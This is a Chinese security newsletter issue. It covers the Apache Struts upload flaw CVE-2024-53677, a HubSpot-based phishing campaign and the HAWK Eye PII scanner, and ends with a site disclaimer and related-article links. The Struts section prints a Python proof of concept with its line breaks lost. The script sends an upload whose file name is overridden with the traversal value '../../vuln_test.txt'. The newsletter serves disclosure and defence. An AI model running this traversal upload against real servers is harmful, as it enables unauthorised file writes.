网安瞭望台第16期

国内外要闻

Apache Struts 文件上传漏洞(CVE - 2024 - 53677)

    近日,Apache Struts 被发现存在文件上传漏洞(CVE - 2024 - 53677),安恒 CERT 评级为 2 级,CVSS3.1 评分为 8.1。

    漏洞危害:若用户未正确配置验证和过滤机制,攻击者可操纵文件上传参数启用路径遍历,利用未授权的上传功能执行恶意代码。需注意,未使用 FileUploadInterceptor 的情况下不受该漏洞影响。

    POC为:


import requests
import argparse
import logging
from urllib.parse import urljoin
from requests_toolbelt.multipart.encoder import MultipartEncoder
import random# 配置日志记录
logging.basicConfig(level=logging.INFO,format="%(asctime)s [%(levelname)s] %(message)s",handlers=[logging.StreamHandler()]
)def detect_vulnerability(target_url, upload_endpoint):"""非破坏性检测CVE - 2024 - 53677漏洞"""logging.info("Starting detection for CVE - 2024 - 53677 (S2 - 067)...")upload_url = urljoin(target_url, upload_endpoint)test_filename = "../../vuln_test.txt"harmless_content = "S2 - 067 detection test."# 尝试使用OGNL绑定覆盖文件名files = {"upload": ("test.txt", harmless_content, "text/plain"),"top.uploadFileName": test_filename  # 尝试覆盖文件名}# 自定义Content - Type边界boundary = "----WebKitFormBoundary" + "".join(random.choices("abcdefghijklmnopqrstuvwxyz0123456789", k=16))m = MultipartEncoder(fields=files, boundary=boundary)headers = {"User - Agent": "Mozilla/5.0","Content - Type": m.content_type}logging.info(f"Sending test request to upload endpoint: {upload_url}")try:# 发送文件上传请求response = requests.post(upload_url, headers=headers, data=m, timeout=10)# 分析HTTP响应if response.status_code == 200:logging.info("[INFO] File upload request succeeded.")if "vuln_test.txt" in response.text:logging.warning("[ALERT] File name overwrite detected. Target may be vulnerable!")else:logging.info("[INFO] Target does not appear vulnerable.")elif response.status_code in [403, 401]:logging.info("[INFO] Access denied. Ensure proper permissions.")else:logging.info(f"[INFO] Unexpected HTTP response: {response.status_code}")except requests.exceptions.RequestException as e:logging.error(f"[ERROR] Request failed: {e}")def main():parser = argparse.ArgumentParser(description="CVE - 2024 - 53677 (S2 - 067) Non - destructive Detection Tool")parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://example.com)")parser.add_argument("--upload_endpoint", required=True, help="Path to file upload endpoint (e.g., /upload.action)")args = parser.parse_args()logging.info("Starting detection process...")detect_vulnerability(args.url, args.upload_endpoint)logging.info("Detection process completed.")if __name__ == "__main__":main()

漏洞靶场

https://github.com/rockmelodies/struts2-vuln-test

图片

HubPhish 利用 HubSpot 工具针对欧洲用户的凭证窃取攻击

    近期,网络安全研究人员披露了一场新的网络钓鱼活动。此次活动以欧洲公司为目标,旨在窃取账户凭证并掌控受害者的微软 Azure 云基础设施。该活动因攻击链中滥用 HubSpot 工具而被 Palo Alto Networks Unit 42 命名为 HubPhish,其目标至少涵盖欧洲 20,000 名汽车、化工和化合物制造行业的用户。

图片

    据安全研究人员 Shachar Roitman、Ohad Benyamin Maimon 和 William Gamazo 在与 The Hacker News 分享的报告中称,该活动的钓鱼尝试在 2024 年 6 月达到顶峰,攻击者利用 HubSpot 免费表单构建器服务创建虚假表单。攻击过程是先发送带有 Docusign 主题诱饵的钓鱼邮件,诱使用户查看文档,随后将用户重定向到恶意的 HubSpot 免费表单构建器链接,接着引导至虚假的 Office 365 Outlook Web App 登录页面以窃取凭证。Unit 42 指出,他们识别出至少 17 个有效的免费表单用于将受害者重定向到不同的威胁行为者控制的域名,其中很大一部分域名托管在 “.buzz” 顶级域名上,且该钓鱼活动通过包括 Bulletproof VPS 主机在内的各种服务进行托管,威胁行为者还利用此基础设施在账户接管操作期间访问受感染的微软 Azure 租户。成功获取账户访问权限后,攻击者会在账户下添加其控制的新设备以建立持久性。

    与此同时,攻击者还被发现通过在钓鱼邮件中冒充 SharePoint,传播名为 XLoader(Formbook 的后继者)的信息窃取恶意软件家族。此外,钓鱼攻击正不断寻找新方法来绕过电子邮件安全措施,如滥用谷歌日历和谷歌绘图等合法服务,以及假冒 Proofpoint、Barracuda Networks、Mimecast 和 Virtru 等电子邮件安全提供商品牌。利用与谷歌服务相关信任的攻击方式是发送包含日历(.ICS)文件及谷歌表单或谷歌绘图链接的电子邮件,用户点击链接后会被提示点击另一个通常伪装成 reCAPTCHA 或支持按钮的链接,一旦点击,受害者就会被转发到实施金融诈骗的虚假页面。为此,建议用户启用谷歌日历中的 “已知发件人” 设置以防范此类钓鱼攻击。网络安全形势日益严峻,各方需提高警惕,加强防范措施以应对不断变化的网络威胁。

图片

知识分享

HAWK Eye—— 多平台数据安全检测利器

    在当今数字化时代,数据安全面临着前所未有的挑战。HAWK Eye 这款强大的命令行工具应运而生,致力于防范数据泄露与网络威胁。

    HAWK Eye 能够快速扫描多种数据源,包括 S3、MySQL、PostgreSQL、MongoDB、CouchDB、Google Drive、Slack、Redis、Firebase、文件系统以及 Google Cloud buckets(GCS)等,精准查找个人可识别信息(PII)和机密信息。它运用先进的文本分析与光学字符识别(OCR)技术,深入挖掘诸如 docx、xlsx、pptx、pdf、图像(jpg、png、gif)、压缩文件(zip、tar、rar)甚至视频文件等各类文档格式,确保在不同平台上提供全面的保护。

    其安装方式多样,可通过 pip 或 pip3 轻松安装,如 “pip3 install hawk-scanner”。使用 Docker hub 也是便捷之选,只需按照特定命令挂载配置文件并运行相应指令即可。当然,也能使用 HAWK Eye 二进制文件,还可将其导入自己的 Python 脚本和工作流程,以获取更高的灵活性。例如,在 Python 脚本中可通过 “from hawk_scanner.internals import system; pii = system.scan_file ("/Users/kumarohit/Downloads/Resume.pdf"); print (pii)” 这样的代码来扫描文件。

    HAWK Eye 具备众多关键特性。它能迅速扫描多数据源中的 PII 数据与恶意软件暴露风险,其先进算法和深度扫描能力可进行全面的安全审计。借助 Slack 等集成功能,能实时发出警报与通知,让用户及时知晓潜在的数据漏洞,并且未来还会有更多集成。新的命令支持 S3、MySQL、PostgreSQL、Redis、Firebase、文件系统和 GCS 等,进一步拓展了工具的功能范围。“--debug” 标志可打印所有调试输出,便于全面排查故障;“--json” 标志能将输出保存为 JSON 格式并指定文件名。这款工具在设计上还融入了爱与幽默,让用户在数据安全之旅中享受轻松愉悦的体验。

    在使用方面,若不提供特定命令,默认会运行所有命令(firebase、fs、gcs、mysql、text、couchdb、gdrive、gdrive workspace、slack、postgresql、redis、s3)。同时,它提供了丰富的选项,如 “firebase” 可扫描 Firebase 配置文件中的 PII 和机密数据,“fs” 用于扫描文件系统配置文件等,还可通过 “--connection” 指定连接 YAML 本地文件路径,“--fingerprint” 提供指纹文件路径等。

    配置 HAWK Eye 连接时,需使用 YAML 文件存储各种数据源的连接配置文件(connection.yml),该文件位于 config 目录。用户可根据需求添加或删除配置文件中的数据源配置,若无需扫描全部数据源,也可仅配置部分数据源。

    此外,HAWK Eye 的扩展性允许开发者贡献新的安全命令。开发者可通过在 GitHub 上 fork 仓库,在 commands 目录创建新的 Python 文件并定义执行函数,提供清晰文档与注释,测试命令后提交 pull request 等步骤来添加新命令。同时,开源社区也可通过遵循贡献指南来为提升 HAWK Eye 保障数据源安全的能力贡献力量,包括遵循编码标准、编写清晰的提交消息、包含合适的测试用例以及更新 README.md 文件等步骤。

    HAWK Eye 曾在 Black Hat SecTor 2023、Black Hat Middle East and Africa 2023、Black Hat Europe 2023 等会议上亮相。

图片

图片

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/890436.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

基于python使用UDP协议对飞秋进行通讯—DDOS

基于飞秋的信息传输 声明:笔记的只是方便各位师傅学习知识,以下代码、网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。 老规矩,封面在文末! 飞秋介绍 (…

JAVA:组合模式(Composite Pattern)的技术指南

1、简述 组合模式(Composite Pattern)是一种结构型设计模式,旨在将对象组合成树形结构以表示“部分-整体”的层次结构。它使客户端对单个对象和组合对象的使用具有一致性。 设计模式样例:https://gitee.com/lhdxhl/design-pattern-example.git 2、什么是组合模式 组合模式…

03.01、三合一

03.01、[简单] 三合一 1、题目描述 三合一。描述如何只用一个数组来实现三个栈。 你应该实现push(stackNum, value)、pop(stackNum)、isEmpty(stackNum)、peek(stackNum)方法。stackNum表示栈下标,value表示压入的值。 构造函数会传入一个stackSize参数&#xf…

LeetCode:222.完全二叉树节点的数量

跟着carl学算法,本系列博客仅做个人记录,建议大家都去看carl本人的博客,写的真的很好的! 代码随想录 LeetCode:222.完全二叉树节点的数量 给你一棵 完全二叉树 的根节点 root ,求出该树的节点个数。 完全二…

MaxKB基于大语言模型和 RAG的开源知识库问答系统的快速部署教程

1 部署要求 1.1 服务器配置 部署服务器要求: 操作系统:Ubuntu 22.04 / CentOS 7.6 64 位系统CPU/内存:4C/8GB 以上磁盘空间:100GB 1.2 端口要求 在线部署MaxKB需要开通的访问端口说明如下: 端口作用说明22SSH安装…

基于指纹图像的数据隐藏和提取matlab仿真

目录 1.算法运行效果图预览 2.算法运行软件版本 3.部分核心程序 4.算法理论概述 5.算法完整程序工程 1.算法运行效果图预览 (完整程序运行后无水印) 2.算法运行软件版本 matlab2022a 3.部分核心程序 (完整版代码包含详细中文注释和操作步骤视频&#xff09…

kubeadm一键部署K8S 集群架构

kubeadm一键部署K8S 集群架构(centos7) https://www.k8src.cn/ https://kubernetes.io/zh-cn/docs/home/ https://blog.csdn.net/m0_58709145/article/details/140128179 https://blog.csdn.net/jiaqijiaqi666/article/details/129745828 Kubeadm init报错[ERROR CRI]: contai…

直流电机驱动电路分享(HIP4082)

一、原理图分享 注意:M2_INA、M2_INB可直接接3.3V电平信号。 二、芯片介绍 1、HIP4082 HIP4082是一款高频驱动器,专为半桥和全桥应用而设计。它具有四个高/低侧驱动输出,可以提供高达100V的驱动电压。HIP4082还具有逻辑级输入和反馈输入&a…

企业版 YashanDB 23.2.4 分布式集群 数据库一主二备集群安装部署指南

一、概述 1.1 文档目标 本部分旨在为技术人员提供崖山数据库企业版 23.2 在 CentOS 7 x86_64 操作系统上进行安装部署操作的全面且清晰的指引。通过对系统架构、集群拓扑和部署需求的精确阐述,使读者能够在安装过程开始前形成系统的概念架构,为后续的详…

《更了解设计内涵的人更懂设计》

“内涵”的释义摘录于字典,内涵是一种抽象的但绝对存在的感觉,是某个人对一个人或某件事的一种认知感觉。内涵不一定是广义的,也可以是局限在某一特定人对待某一人或某一事的看法。它的形式有很多,但从广泛来讲是一种可给人内在美…

linux firewalld 命令详解

简介 firewalld 是一个在 Linux 中的防火墙管理工具,提供动态接口管理网络流量,它使用区域来定义网络连接的信任级别,并支持 IPv4 和 IPv6。 常用示例 启动防火墙 sudo systemctl start firewalld 停止防火墙 sudo systemctl stop fire…

多模态去噪信息收集

系列博客目录 文章目录 系列博客目录1、Here are some key papers related to multimodal denoising that may be relevant to your research:2、being 搜 Multimodal denoisingMulti-modal deep convolutional dictionary learning for image denoising 1、Here are some key …

element-ui的el-select多选同时获取label与value值

直接上代码&#xff1a; <!DOCTYPE html> <html><head><meta charset"utf-8"><!-- 引入 Element UI 的 CSS --><link rel"stylesheet" href"https://unpkg.com/element-ui/lib/theme-chalk/index.css"><…

一文了解 gis 相关服务=》及前端地图服务相关总结

文章目录 概要OGC技术名词解释cesium 应用案例openlayers 中应用实例XYZ服务OSM服务WMS服务WMTS服务WFS服务 mapbox 应用实例矢量瓦片服务栅格瓦片服务WMS服务WFS服务 leaflet 中 地图服务实例加载OpenStreetMap瓦片图层加载自定义XYZ瓦片图层加载WMS服务图层加载WFS服务图层加…

oracle 加字段和字段注释 sql

在 Oracle 数据库中&#xff0c;你可以使用 ALTER TABLE 语句来添加字段&#xff0c;并使用 COMMENT ON COLUMN 语句来添加字段注释。以下是一个示例&#xff1a; 假设你有一个名为 employees 的表&#xff0c;你想要添加一个名为 email 的字段&#xff0c;并为其添加注释。 …

Cookie与爬虫

文章目录 Cookie与爬虫&#xff1a;我们需要了解的那些知识一、什么是Cookie&#xff1f;Cookie的主要特点&#xff1a; 二、Cookie的主要作用三、爬虫与Cookie的关系1. **身份验证**2. **防爬机制**3. **会话管理**4. **绕过限制**5. **数据管理与更新** 四、需要注意的事项五…

性能】JDK和Jmeter的安装与配置

一、JDK环境配置 1. 下载JDK 官网下载地址&#xff1a;http://www.oracle.com/technetwork/java/javase/downloads/java-archive-downloads-javase7-521261.html 选择对应系统的安装包&#xff0c;下载后安装&#xff0c;安装中记录JDK安装的地址&#xff0c;之后一直点击下一…

【WPF】RenderTargetBitmap的使用

在WPF&#xff08;Windows Presentation Foundation&#xff09;中&#xff0c;RenderTargetBitmap 是一个非常有用的类&#xff0c;它允许你将任何可视元素&#xff08;如 UIElement 或 Visual 的实例&#xff09;渲染到位图中。这在需要生成图像快照、导出可视化内容为图片文…

【5】C#期末复习第5套

1.int a[3][2]{2,4,6,8,10.12};则*&#xff08;a[1]1&#xff09;的值是8 指向&#xff08;a[1]的第二个元素&#xff09; 再* 2.合并字符串库函数strcat 3.比较字符串库函数strcmp 4.执行结果是x3&#xff0c;y3 int x3,y; int *px&x; y*px; (优先级高于*) 5.*p[5]没…

Mysql之YUM安装时GPG 密钥报错问题处理

一、背景说明 使用YUM安装mysql5.7的时候报错&#xff0c;报错信息提示未安装公钥。博主查看/etc/yum.repos.d/mysql-community.repo配置文件中关于公钥的配置&#xff0c;确实启用了公钥验证&#xff0c;博主再排查过程中还是走了一些弯路&#xff0c;最终顺利解决了&#xff…